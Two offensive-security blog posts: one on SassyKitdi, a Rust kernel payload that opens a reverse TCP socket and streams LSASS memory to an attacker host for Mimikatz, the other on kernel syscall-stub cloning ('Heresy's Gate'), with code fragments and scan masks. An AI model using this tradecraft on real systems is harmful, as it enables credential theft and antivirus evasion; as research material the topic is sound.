SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump

Introduction

This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). The payload can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, e.g. bad drivers. It is universal from (at least) Windows 2000 to Windows 10, without having to carry around weird DKOM offsets.

The payload has 0 interaction with user-mode, and creates a reverse TCP socket using the Transport Driver Interface (TDI), a precursor to the more modern Winsock Kernel (WSK). The LSASS.exe process memory and modules are then sent over the wire where they can be transformed into a minidump file on the attacker's end and passed into a tool such as Mimikatz to extract credentials.

tl;dr: PoC || GTFO GitHub

The position-independent shellcode is ~3300 bytes and written entirely in the Rust programming language, using many of its high level abstractions. I will outline some of the benefits of Rust for all future shellcoding needs, and precautions that need to be taken.

Figure 0: An oversimplification of the SassyKitdi methodology.

I obviously don't have every AV on hand to test against, but given that most AV misses obvious user-mode stuff thrown at it, I can only assume that almost no antivirus currently available is able to detect the methodology.

Finally, I will discuss what future kernel mode rootkits could look like, if one took this example a couple steps further. What's old is new again.

Transport Driver Interface

TDI is an old school method to talk to all types of network transports. In this case it will be used to create a reverse TCP connection back to the attacker. Other payloads such as Bind Sockets, as well as UDP, would follow a similar methodology.

The use of TDI in rootkits is not exactly widespread, but it has been documented in the following books which served as references for this code:

  • Vieler, R. (2007). Professional Rootkits. Indianapolis, IN: Wiley Technology Pub.
  • Hoglund, G., & Butler, J. (2009). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ: Addison-Wesley.

Opening the TCP Device Object

TDI device objects are found by their device name, in our case \Device\Tcp. Essentially, you use the ZwCreateFile() kernel API with the device name, and pass options in through the use of our old friend File Extended Attributes.


pub type ZwCreateFile = extern "stdcall" fn(
    FileHandle: PHANDLE,
    AccessMask: ACCESS_MASK,
    ObjectAttributes: POBJECT_ATTRIBUTES,
    IoStatusBlock: PIO_STATUS_BLOCK,
    AllocationSize: PLARGE_INTEGER,
    FileAttributes: ULONG,
    ShareAccess: ULONG,
    CreateDisposition: ULONG,
    CreateOptions: ULONG,
    EaBuffer: PVOID,
    EaLength: ULONG,
) -> NTSTATUS;

The device name is passed in the ObjectAttributes field, and the configuration is passed in the EaBuffer. We must create a Transport handle (FEA: TransportAddress) and a Connection handle (FEA: ConnectionContext).

The TransportAddress FEA takes a TRANSPORT_ADDRESS structure, which for IPv4 consists of a few other structures. It is at this point that we can choose which interface to bind to, or which port to use. In our case, we will choose 0.0.0.0 with port 0, and the kernel will bind us to the main interface with a random ephemeral port.


#[repr(C, packed)]
pub struct TDI_ADDRESS_IP {
    pub sin_port: USHORT,
    pub in_addr: ULONG,
    pub sin_zero: [UCHAR; 8],
}

#[repr(C, packed)]
pub struct TA_ADDRESS {
    pub AddressLength: USHORT,
    pub AddressType: USHORT,
    pub Address: TDI_ADDRESS_IP,
}

#[repr(C, packed)]
pub struct TRANSPORT_ADDRESS {
    pub TAAddressCount: LONG,
    pub Address: [TA_ADDRESS; 1],
}
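
As a rough host-side sketch (not the payload's actual code), here is how the wildcard 0.0.0.0:0 bind address could be filled in. The snake_case type names and the `wildcard_ipv4()` / `layout_sizes()` helpers are made up for illustration; the two constants are the values I believe tdi.h uses for IPv4.

```rust
use core::mem::size_of;

// Values from tdi.h: the IPv4 address type and sizeof(TDI_ADDRESS_IP).
pub const TDI_ADDRESS_TYPE_IP: u16 = 2;
pub const TDI_ADDRESS_LENGTH_IP: u16 = 14;

#[repr(C, packed)]
#[derive(Clone, Copy)]
pub struct TdiAddressIp {
    pub sin_port: u16,
    pub in_addr: u32,
    pub sin_zero: [u8; 8],
}

#[repr(C, packed)]
#[derive(Clone, Copy)]
pub struct TaAddress {
    pub address_length: u16,
    pub address_type: u16,
    pub address: TdiAddressIp,
}

#[repr(C, packed)]
#[derive(Clone, Copy)]
pub struct TransportAddress {
    pub ta_address_count: i32,
    pub address: [TaAddress; 1],
}

/// Hypothetical helper: 0.0.0.0 port 0, letting the kernel pick interface and port.
pub fn wildcard_ipv4() -> TransportAddress {
    TransportAddress {
        ta_address_count: 1,
        address: [TaAddress {
            address_length: TDI_ADDRESS_LENGTH_IP,
            address_type: TDI_ADDRESS_TYPE_IP,
            address: TdiAddressIp { sin_port: 0, in_addr: 0, sin_zero: [0; 8] },
        }],
    }
}

/// Sizes of the three packed structs, handy for sanity-checking the EA buffer length.
pub fn layout_sizes() -> (usize, usize, usize) {
    (
        size_of::<TdiAddressIp>(),
        size_of::<TaAddress>(),
        size_of::<TransportAddress>(),
    )
}
```

Because the structs are packed, fields should be copied out by value rather than borrowed.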

The ConnectionContext FEA allows setting of an arbitrary context instead of a defined struct. In the example code we just set this to NULL and move on.

At this point we have created the Transport Handle, Transport File Object, Connection Handle, and Connection File Object.

Connecting to an Endpoint

After initial setup, the rest of TDI API is performed through IOCTLs to the device object associated with our File Objects.

TDI uses IRP_MJ_INTERNAL_DEVICE_CONTROL with various minor codes. The ones we are interested in are:


#[repr(u8)]
pub enum TDI_INTERNAL_IOCTL_MINOR_CODES {
    TDI_ASSOCIATE_ADDRESS = 0x1,
    TDI_CONNECT = 0x3,
    TDI_SEND = 0x7,
    TDI_SET_EVENT_HANDLER = 0xb,
}

Each of these internal IOCTLs has various structures associated with them. The basic methodology is to:

  1. Get the Device Object from the File Object using IoGetRelatedDeviceObject()
  2. Create the internal IOCTL IRP using IoBuildDeviceIoControlRequest()
  3. Set the opcode inside IO_STACK_LOCATION.MinorFunction
  4. Copy the op's struct pointer to the IO_STACK_LOCATION.Parameters
  5. Dispatch the IRP with IofCallDriver()
  6. Wait for the operation to complete using KeWaitForSingleObject() (optional)

For the TDI_CONNECT operation, the IRP parameters include a TRANSPORT_ADDRESS structure (defined in the previous section). This time, instead of setting it to 0.0.0.0 port 0, we set it to the address and port we want to connect to, both in big endian (network byte order).
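
To make the byte order concrete, here is a small sketch that derives the integer values a little-endian (x86/x64) target needs so that the bytes land in memory in network order. `connect_args()` is a hypothetical helper, not part of the PoC.

```rust
/// Hypothetical helper: returns (in_addr, sin_port) as the integers to store on a
/// little-endian target so that memory holds the address and port in network order.
pub fn connect_args(ip: [u8; 4], port: u16) -> (u32, u16) {
    // The four octets must appear in memory in the order they are written.
    let in_addr = u32::from_le_bytes(ip);
    // The port must appear in memory high byte first.
    let sin_port = u16::from_le_bytes(port.to_be_bytes());
    (in_addr, sin_port)
}
```

For 192.168.1.221 port 64444 this gives 0xdd01a8c0 and 0xBCFB, the same constants used in the connect example later in this post.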

Sending Data Over the Wire

If the connection IRP succeeds in establishing a TCP connection, we can then send TDI_SEND IRPs to the TCP device.

The TDI driver expects a Memory Descriptor List (MDL) that describes the buffer to send over the network.

Assuming we want to send some arbitrary data over the wire, we must perform the following steps:

  1. ExAllocatePool() a buffer and RtlCopyMemory() the data over (optional)
  2. IoAllocateMdl() providing the buffer address and size
  3. MmProbeAndLockPages() to page-in during the send operation
  4. Dispatch the Send IRP
  5. The I/O manager will unlock the pages and free the MDL
  6. ExFreePool() the buffer (optional)

In this case the MDL is attached to the IRP. In the Parameters structure we can just set SendFlags to 0 and SendLength to the data size.


#[repr(C, packed)]
pub struct TDI_REQUEST_KERNEL_SEND {
    pub SendLength: ULONG,
    pub SendFlags: ULONG,
}

Dumping LSASS from Kernel Mode

LSASS is of course the goldmine on Windows, where prizes such as cleartext credentials and Kerberos information can be obtained. Many AV vendors are getting better at hardening LSASS against dumping from user-mode. But we'll do it from the privilege of the kernel.

Mimikatz requires 3 streams to process a minidump: System Information, Memory Ranges, and Module List.
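
On the attacker's end, those three streams hang off a minidump header and stream directory. The sketch below serializes just that prologue using the public minidump layout; `minidump_prologue()` and `StreamEntry` are names invented here. I'm also assuming the memory ranges go in a Memory64ListStream, which the text above does not state.

```rust
// Stream type values from the public minidump format (minidumpapiset.h).
pub const MODULE_LIST_STREAM: u32 = 4;
pub const SYSTEM_INFO_STREAM: u32 = 7;
pub const MEMORY64_LIST_STREAM: u32 = 9; // assumption: 64-bit list for the memory ranges

/// One directory entry: (stream type, data size, file offset of the data).
pub type StreamEntry = (u32, u32, u32);

/// Serialize MINIDUMP_HEADER (32 bytes) followed by the stream directory
/// (12 bytes per entry), everything little-endian.
pub fn minidump_prologue(streams: &[StreamEntry]) -> Vec<u8> {
    let mut out = Vec::with_capacity(32 + 12 * streams.len());
    out.extend_from_slice(b"MDMP"); // Signature
    out.extend_from_slice(&0xA793u32.to_le_bytes()); // Version (MINIDUMP_VERSION)
    out.extend_from_slice(&(streams.len() as u32).to_le_bytes()); // NumberOfStreams
    out.extend_from_slice(&32u32.to_le_bytes()); // StreamDirectoryRva: right after header
    out.extend_from_slice(&0u32.to_le_bytes()); // CheckSum
    out.extend_from_slice(&0u32.to_le_bytes()); // TimeDateStamp
    out.extend_from_slice(&0u64.to_le_bytes()); // Flags
    for &(stream_type, data_size, rva) in streams {
        out.extend_from_slice(&stream_type.to_le_bytes());
        out.extend_from_slice(&data_size.to_le_bytes());
        out.extend_from_slice(&rva.to_le_bytes());
    }
    out
}
```

The stream bodies themselves (system info, module list, memory descriptors plus raw pages) would follow at the offsets recorded in the directory.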

Obtaining Operating System Information

Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:


#[repr(C)]
pub struct RTL_OSVERSIONINFOW {
    pub dwOSVersionInfoSize: ULONG,
    pub dwMajorVersion: ULONG,
    pub dwMinorVersion: ULONG,
    pub dwBuildNumber: ULONG,
    pub dwPlatformId: ULONG,
    pub szCSDVersion: [UINT16; 128],
}

Scraping All Memory Regions

Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().


pub type ZwQueryVirtualMemory = extern "stdcall" fn(
    ProcessHandle: HANDLE,
    BaseAddress: PVOID,
    MemoryInformationClass: MEMORY_INFORMATION_CLASS,
    MemoryInformation: PVOID,
    MemoryInformationLength: SIZE_T,
    ReturnLength: PSIZE_T,
) -> crate::types::NTSTATUS;

Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:


#[repr(C)]
pub struct MEMORY_BASIC_INFORMATION {
    pub BaseAddress: PVOID,
    pub AllocationBase: PVOID,
    pub AllocationProtect: ULONG,
    pub PartitionId: USHORT,
    pub RegionSize: SIZE_T,
    pub State: ULONG,
    pub Protect: ULONG,
    pub Type: ULONG,
}

For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.
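
The iteration itself is a simple loop. Below is a sketch that stands in a closure for the real ZwQueryVirtualMemory() call so it can run anywhere; `Region`, `walk_regions()`, and the `fake_query()` address space are all invented for the demo.

```rust
pub const MEM_COMMIT: u32 = 0x1000;
pub const MEM_FREE: u32 = 0x10000;

/// The three MEMORY_BASIC_INFORMATION fields the walk cares about.
#[derive(Clone, Copy, Debug, PartialEq)]
pub struct Region {
    pub base: usize,
    pub size: usize,
    pub state: u32,
}

/// Start at address 0 and keep stepping to base + size until the query fails.
/// `query` is a stand-in for ZwQueryVirtualMemory(); Err carries an NTSTATUS.
pub fn walk_regions<F>(mut query: F) -> Vec<Region>
where
    F: FnMut(usize) -> Result<Region, i32>,
{
    let mut regions = Vec::new();
    let mut base = 0usize;
    while let Ok(region) = query(base) {
        if region.size == 0 {
            break; // nothing returned, treat as the end
        }
        regions.push(region);
        match region.base.checked_add(region.size) {
            Some(next) => base = next,
            None => break, // wrapped past the top of the address space
        }
    }
    regions
}

/// Made-up address space: free, committed, free, then an NT error.
pub fn fake_query(addr: usize) -> Result<Region, i32> {
    const LAYOUT: [Region; 3] = [
        Region { base: 0x0, size: 0x10000, state: MEM_FREE },
        Region { base: 0x10000, size: 0x3000, state: MEM_COMMIT },
        Region { base: 0x13000, size: 0xd000, state: MEM_FREE },
    ];
    LAYOUT
        .iter()
        .copied()
        .find(|r| addr >= r.base && addr < r.base + r.size)
        .ok_or(0xC000000Du32 as i32) // STATUS_INVALID_PARAMETER
}
```

A dumper would presumably only ship regions whose state is MEM_COMMIT, though that filtering is my assumption rather than something spelled out above.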

Collecting List of Loaded Modules

Mimikatz also needs to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr.InLoadOrderLinks, which is a well-documented methodology to obtain the linked list of LDR_DATA_TABLE_ENTRY entries.


#[cfg(target_arch="x86_64")]
#[repr(C, packed)]
pub struct LDR_DATA_TABLE_ENTRY {
    pub InLoadOrderLinks: LIST_ENTRY,
    pub InMemoryOrderLinks: LIST_ENTRY,
    pub InInitializationOrderLinks: LIST_ENTRY,
    pub DllBase: PVOID,
    pub EntryPoint: PVOID,
    pub SizeOfImage: ULONG,
    pub Padding_0x44_0x48: [BYTE; 4],
    pub FullDllName: UNICODE_STRING,
    pub BaseDllName: UNICODE_STRING,
    /* ...etc... */
}

Just iterate the linked list til you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.
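
Here is a toy version of that walk over a circular doubly-linked list, runnable on any host. The `Module` struct is a cut-down stand-in for LDR_DATA_TABLE_ENTRY (a plain `&str` instead of a UNICODE_STRING), and the module names, bases, and sizes in `demo_walk()` are invented.

```rust
use core::ptr;

#[repr(C)]
pub struct ListEntry {
    pub flink: *mut ListEntry,
    pub blink: *mut ListEntry,
}

/// Stand-in for LDR_DATA_TABLE_ENTRY. The links are the first field, so a
/// pointer to the links is also a pointer to the entry (offset 0).
#[repr(C)]
pub struct Module {
    pub links: ListEntry,
    pub dll_base: usize,
    pub size_of_image: u32,
    pub name: &'static str,
}

/// Follow flink from the head until we wind back at the head.
/// Safety: `head` must be a valid list whose nodes are all `Module`s.
pub unsafe fn walk_modules(head: *const ListEntry) -> Vec<(&'static str, usize, u32)> {
    let mut out = Vec::new();
    unsafe {
        let mut cur = (*head).flink as *const ListEntry;
        while cur != head {
            let module = &*(cur as *const Module);
            out.push((module.name, module.dll_base, module.size_of_image));
            cur = module.links.flink as *const ListEntry;
        }
    }
    out
}

/// Build a small fake list (head sentinel + three modules) and walk it.
pub fn demo_walk() -> Vec<(&'static str, usize, u32)> {
    let null = || ListEntry { flink: ptr::null_mut(), blink: ptr::null_mut() };
    let mut head = null();
    // The Vec is never resized after linking, so node addresses stay stable.
    let mut modules = vec![
        Module { links: null(), dll_base: 0x7ff6_0000_0000, size_of_image: 0x10000, name: "lsass.exe" },
        Module { links: null(), dll_base: 0x7ffa_1000_0000, size_of_image: 0x1f0000, name: "ntdll.dll" },
        Module { links: null(), dll_base: 0x7ffa_0800_0000, size_of_image: 0x1a0000, name: "lsasrv.dll" },
    ];
    let head_ptr: *mut ListEntry = &mut head;
    let mut prev = head_ptr;
    for m in modules.iter_mut() {
        let node = m as *mut Module as *mut ListEntry;
        unsafe {
            (*prev).flink = node;
            (*node).blink = prev;
        }
        prev = node;
    }
    unsafe {
        (*prev).flink = head_ptr; // close the circle
        (*head_ptr).blink = prev;
        walk_modules(head_ptr)
    }
}
```

In the real payload the pointers would be LSASS user-mode addresses read while attached to the process, and the cast would need the proper field offset if a list other than the first one were walked.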

Notes on Shellcoding in Rust

Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-pc-windows-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

Here's an example of how nice shellcoding in Rust can be:


let mut socket = nttdi::TdiSocket::new(tdi_ctx);

socket.add_recv_handler(recv_handler);
socket.connect(0xdd01a8c0, 0xBCFB)?; // 192.168.1.221:64444

socket.send("abc".as_bytes().as_ptr(), 3)?;

Compiler Optimizations

Rust sits atop LLVM, an intermediate language before final code generation, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

We can set the Cargo.toml file to use opt-level='z' (optimize for size) and lto=true (link-time optimization) to further reduce generated code size.
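
In Cargo.toml terms that looks roughly like the fragment below. The first two keys are the ones named above; `panic` and `codegen-units` are extra size-oriented settings I'm adding as assumptions, not something the PoC is confirmed to use.

```toml
[profile.release]
opt-level = "z"     # optimize for size
lto = true          # link-time optimization
panic = "abort"     # assumption: no unwinding machinery in shellcode
codegen-units = 1   # assumption: gives the optimizer a whole-crate view
```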

Using High-Level Constructs

The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.
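
A minimal sketch of the idea, with a counter standing in for the real ZwClose() call so it can run outside the kernel. `HandleGuard` and `use_handle()` are hypothetical names, not types from the PoC.

```rust
use core::cell::Cell;

/// Owns a raw handle value and "closes" it when dropped.
pub struct HandleGuard<'a> {
    raw: usize,
    close_calls: &'a Cell<u32>, // stand-in for the side effect of ZwClose()
}

impl<'a> HandleGuard<'a> {
    pub fn new(raw: usize, close_calls: &'a Cell<u32>) -> Self {
        HandleGuard { raw, close_calls }
    }

    pub fn raw(&self) -> usize {
        self.raw
    }
}

impl Drop for HandleGuard<'_> {
    fn drop(&mut self) {
        // In a kernel payload this is where ZwClose(self.raw) would be called.
        self.close_calls.set(self.close_calls.get() + 1);
    }
}

/// The guard goes out of scope at the end of the function, on every path.
pub fn use_handle(close_calls: &Cell<u32>) -> usize {
    let guard = HandleGuard::new(0x44, close_calls);
    guard.raw()
}
```

The same pattern would apply to pool allocations, with the destructor calling ExFreePool() instead.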

Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.
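
Something like the following sketch shows the shape of it. The `nt()` wrapper and the fake `open_device()` / `connect()` steps are invented for illustration; the only real-world facts assumed are that a non-negative NTSTATUS means success and that STATUS_ACCESS_DENIED is 0xC0000022.

```rust
pub type NtStatus = i32;

pub const STATUS_SUCCESS: NtStatus = 0;
pub const STATUS_ACCESS_DENIED: NtStatus = 0xC0000022u32 as i32;

/// Same test as NT_SUCCESS(): non-negative status codes are success.
pub fn nt(status: NtStatus) -> Result<(), NtStatus> {
    if status >= 0 { Ok(()) } else { Err(status) }
}

// Two made-up steps standing in for real kernel calls.
fn open_device(fail: bool) -> Result<usize, NtStatus> {
    nt(if fail { STATUS_ACCESS_DENIED } else { STATUS_SUCCESS })?;
    Ok(0x44) // pretend handle
}

fn connect(handle: usize) -> Result<(usize, u16), NtStatus> {
    Ok((handle, 49152)) // tuple in the Ok slot: (handle, local port)
}

/// Each `?` returns early with the NTSTATUS if the step failed.
pub fn open_and_connect(fail: bool) -> Result<(usize, u16), NtStatus> {
    let handle = open_device(fail)?;
    let endpoint = connect(handle)?;
    Ok(endpoint)
}
```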

For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and all edge cases are not taken into account.

Conclusion

SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode Meterpreter like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

"Heresy's Gate": Kernel Zw*/NTDLL Scraping + "Work Out": Ring 0 to Ring 3 via Worker Factories

Introduction

What's in a name? Naming things is the first step in being able to talk about them.

What's a lower realm than Hell? Heresy is the 6th Circle of Hell in Dante's Inferno.

With Hell's Gate scraping syscalls in user-mode, you can think about Heresy's Gate as the generic methodology to dynamically generate and execute kernel-mode syscall stubs that are not exported by ntoskrnl.exe. Much like Hell's Gate, the general idea has been discussed previously (in this case since at least NT 4), however older techniques (Nebbett's Gate) no longer work and this post may introduce new methods.

A proud people who believe in political throwback, that's not all I'm here to present you.

Unlocking Heresy's Gate, among other things, gives access to a plethora of novel Ring 0 (kernel) to Ring 3 (user) transitions, as is required by exploit payloads in EternalBlue (DoublePulsar), BlueKeep, and SMBGhost. Just to name a few.

I will describe such a method, Work Out, using the undocumented Worker Factory feature that is the kernel backbone of the user-mode Thread Pool API added in Windows Vista.

tl;dr: PoC || GTFO GitHub

All of this information was casually shared with a member of MSRC and forwarded to the Windows Defender team prior to publication. These are not vulnerabilities; Heresy's Gate is rootkit tradecraft to execute private syscalls, and Work Out is a new kernel mode exploit payload.

I have no knowledge of if/how/when mitigations/ETW/etc. may be added to NT.

Heresy's Gate

Many fun routines are not readily exported by the Executive binary (ntoskrnl.exe). They simply do not exist in import/export directories for any module. And with their ntoskrnl.exe file/RVA offsets changing between each compile, they can be difficult to find in a generic way. Not exactly ASLR, but similar.

However, if a syscall exists, NTDLL.DLL/USER32.DLL/WIN32U.DLL are gonna have stubs for them.

  • Heaven's Gate: Execute 64-bit syscalls in WoW64 (32-bit code)
  • Hell's Gate: Execute syscalls in user-mode directly by scraping ntdll op codes
  • Heresy's Gate: Execute unexported syscalls in kernel-mode (described here by scraping ntdll and &ZwReadFile)

I'll lump Heaven's Gate into this, even though it is only semi-related. Alex Ionescu has written about how CFG killed the original technique.

I guess if you went further up the chain than WoW64, or perhaps something fancy in managed code land or a Universal Windows Platform app, you'd have a Higher Gate? And since Heresy is only the sixth circle, there's still room to go lower... HAL's Gate?

Closing Nebbett's Gate

People have been heuristically scanning function signatures and even disassembling in the kernel for ages to find unexported routines. I wondered what the earliest reference would be for executing an unexported routine.

On pages 433-434 of "Windows NT/2000 Native API Reference", Gary Nebbett describes finding unexported syscalls in ntdll and executing their user-mode stubs directly in kernel mode!

Interesting indeed. I thought: there's no way this code could still work!

Open questions:

  1. There must be issues with how the syscall stub has changed over the years?
  2. Can modern "syscall" instruction (not int 0x2e) even execute in kernel mode?
  3. There's probably issues with modern kernels implementing SMEP (though you could just Capcom it and piss off PatchGuard in your payload).
  4. Will this screw up PreviousMode and we need user buffers and such?
  5. Aren't these ntdll functions often hooked by user-mode antivirus code?
  6. What about the logic of Meltdown KVA Shadow?

Meltdown KVA Shadow Page Fault Loop

And indeed, it seems that the Meltdown KVA Shadow strikes again to spoil our exploit payload fun.

I attempted this method on Windows 10 x64 and to my surprise I did not immediately crash! However, my call to sc.exe appeared to hang forever.

Let's peek at what the thread is doing:

Oof, it appears to be in some type of a page fault loop. Indeed setting a breakpoint on KiPageFaultShadow will cause it to hit over and over.

Maybe this and all the other potential issues could be worked around?

Instead of fighting with Meltdown patch and all the other outstanding issues, I decided to scrape opcodes out of NTDLL and copy an exported Zw function stub out of the Executive.

NTDLL Opcode Scraping

To scrape an opcode number out of NTDLL, we must find its Base Address in kernel mode. There are at least 3 ways to accomplish this.

  1. You can map it out of a process's PEB->Ldr using PsGetProcessPeb() while under KeStackAttachProcess().
  2. You can call ZwQuerySystemInformation() with the SystemModuleInformation class.
  3. You can look it up in the KnownDlls section object.

KnownDlls Section Object

I thought the last one is the most interesting and perhaps less known for antivirus detection methods, so we'll go with that. However, I think if I was writing a shellcode I'd go with the first one.


NTSTATUS NTAPI GetNtdllBaseAddressFromKnownDlls(
    _In_ ZW_QUERY_SECTION __ZwQuerySection,
    _Out_ PVOID *OutAddress
)
{
    static UNICODE_STRING KnownDllsNtdllName =
        RTL_CONSTANT_STRING(L"\\KnownDlls\\ntdll.dll");

    NTSTATUS Status = STATUS_SUCCESS;

    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    InitializeObjectAttributes(
        &ObjectAttributes,
        &KnownDllsNtdllName,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        0,
        NULL
    );

    HANDLE SectionHandle = NULL;

    Status = ZwOpenSection(&SectionHandle, SECTION_QUERY, &ObjectAttributes);

    if (NT_SUCCESS(Status))
    {
        // +0x1000 because kernel only checks min size
        UCHAR SectionInfo[0x1000];

        Status = __ZwQuerySection(
            SectionHandle,
            SectionImageInformation,
            &SectionInfo,
            sizeof(SectionInfo),
            0
        );

        if (NT_SUCCESS(Status))
        {
            *OutAddress =
                ((SECTION_IMAGE_INFORMATION*)&SectionInfo)
                    ->TransferAddress;
        }

        ZwClose(SectionHandle);
    }

    return Status;
}

This requires the following struct definition:


typedef struct _SECTION_IMAGE_INFORMATION {
    PVOID TransferAddress;
    // ...
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;

Once you have the NTDLL base address, it is a well-known process to read the PE export directory to find functions by name/ordinal.

Extracting Syscall Opcode

Let's inspect an NTDLL syscall.

Note: Syscalls have changed a lot over the years.

However, the MOV EAX, #OPCODE part is probably pretty stable. And since syscall numbers are used as a table index, they are never larger than 0xFFFF, so the high-order bits will be 0x0000.

You can scan for the opcode using the following mask:


CHAR WildCardByte = '\xff';

// b8 ?? ?? 00 00 mov eax, 0x0000????
UCHAR NtdllScanMask[] = "\xb8\xff\xff\x00\x00";
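
A sketch of the scan itself, with 0xff treated as the wildcard byte as in the mask above. The function names are mine, and the sample stub bytes used in testing are only meant to look like a typical x64 ntdll stub, not to be authoritative for any Windows build.

```rust
pub const WILDCARD: u8 = 0xff;

// b8 ?? ?? 00 00    mov eax, 0x0000????
pub const NTDLL_SCAN_MASK: [u8; 5] = [0xb8, 0xff, 0xff, 0x00, 0x00];

/// Offset of the first position where every non-wildcard mask byte matches.
pub fn find_masked(code: &[u8], mask: &[u8]) -> Option<usize> {
    if mask.is_empty() {
        return None;
    }
    code.windows(mask.len())
        .position(|window| window.iter().zip(mask).all(|(&b, &m)| m == WILDCARD || b == m))
}

/// Pull the 16-bit syscall number out of the immediate of `mov eax, imm32`.
pub fn syscall_number(stub: &[u8]) -> Option<u16> {
    let at = find_masked(stub, &NTDLL_SCAN_MASK)?;
    Some(u16::from_le_bytes([stub[at + 1], stub[at + 2]]))
}
```

One caveat of using 0xff as the wildcard is that the mask cannot require a literal 0xff byte; that is fine for this particular pattern.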

Dynamically Cloning a Zw Call

So we have the opcode from the user-mode stub, now we need to create the kernel-mode stub to call it. We can accomplish this by cloning an existing stub.

ZwReadFile() is pretty generic, so let's go with that.

The MOV EAX instruction right before the final JMP is the syscall opcode. We'll have to overwrite it with our desired opcode.

Fixing nt!KiService* Relative 32 Addresses

So, the LEA and JMP instructions use relative 32-bit addressing. That means each target is encoded as a signed 32-bit offset, within +/-2GB of the end of the instruction.

Converting the relative 32 address to its 64-bit full address is pretty simple code:


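static inline
PVOID NTAPI
ConvertRelative32AddressToAbsoluteAddress(
    _In_reads_(4) PUINT32 Relative32StartAddress
)
{
    // rel32 displacements are signed, so read the offset as INT32;
    // an unsigned offset would break for targets below the instruction.
    INT32 Offset = *(INT32 *)Relative32StartAddress;
    PUCHAR InstructionEndAddress =
        (PUCHAR)Relative32StartAddress + 4;

    return InstructionEndAddress + Offset;
}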
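
The arithmetic is easy to check on the host. Here is a small sketch that works on plain integers instead of live pointers; `rel32_to_absolute()` is a name made up for this example, and it assumes the rel32 field is the last four bytes of the instruction (true for the LEA and JMP forms used here).

```rust
/// `field_addr` is the address of the 4-byte rel32 field, `field` its raw bytes.
/// The target is relative to the end of the instruction, i.e. field_addr + 4.
pub fn rel32_to_absolute(field_addr: u64, field: [u8; 4]) -> u64 {
    // Displacements are signed, so sign-extend before adding.
    let offset = i32::from_le_bytes(field);
    field_addr.wrapping_add(4).wrapping_add(offset as i64 as u64)
}
```

Both forward and backward references resolve correctly because the offset is sign-extended to 64 bits before the addition.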

Since our little stub will not be within +/- 2GB space, we'll have to replace the LEA with a MOVABS, and the JMP (rel32) with a JMP [$+0].

I checked that this mask is stable to at least Windows 7, and probably way earlier.


UCHAR KiServiceLinkageScanMask[] =
    "\x50"                          // 50                    push rax
    "\x9c"                          // 9c                    pushfq
    "\x6a\x10"                      // 6a 10                 push 10h
    "\x48\x8d\x05\x00\x00\x00\x00"; // 48 8d 05 ?? ?? ?? ??  lea rax, [nt!KiServiceLinkage]

UCHAR KiServiceInternalScanMask[] =
    "\x50"                          // 50                    push rax
    "\xb8\x00\x00\x00\x00"          // b8 ?? ?? ?? ??        mov eax, ??
    "\xe9\x00\x00\x00\x00";         // e9 ?? ?? ?? ??        jmp nt!KiServiceInternal

Create a Heretic Call Stub

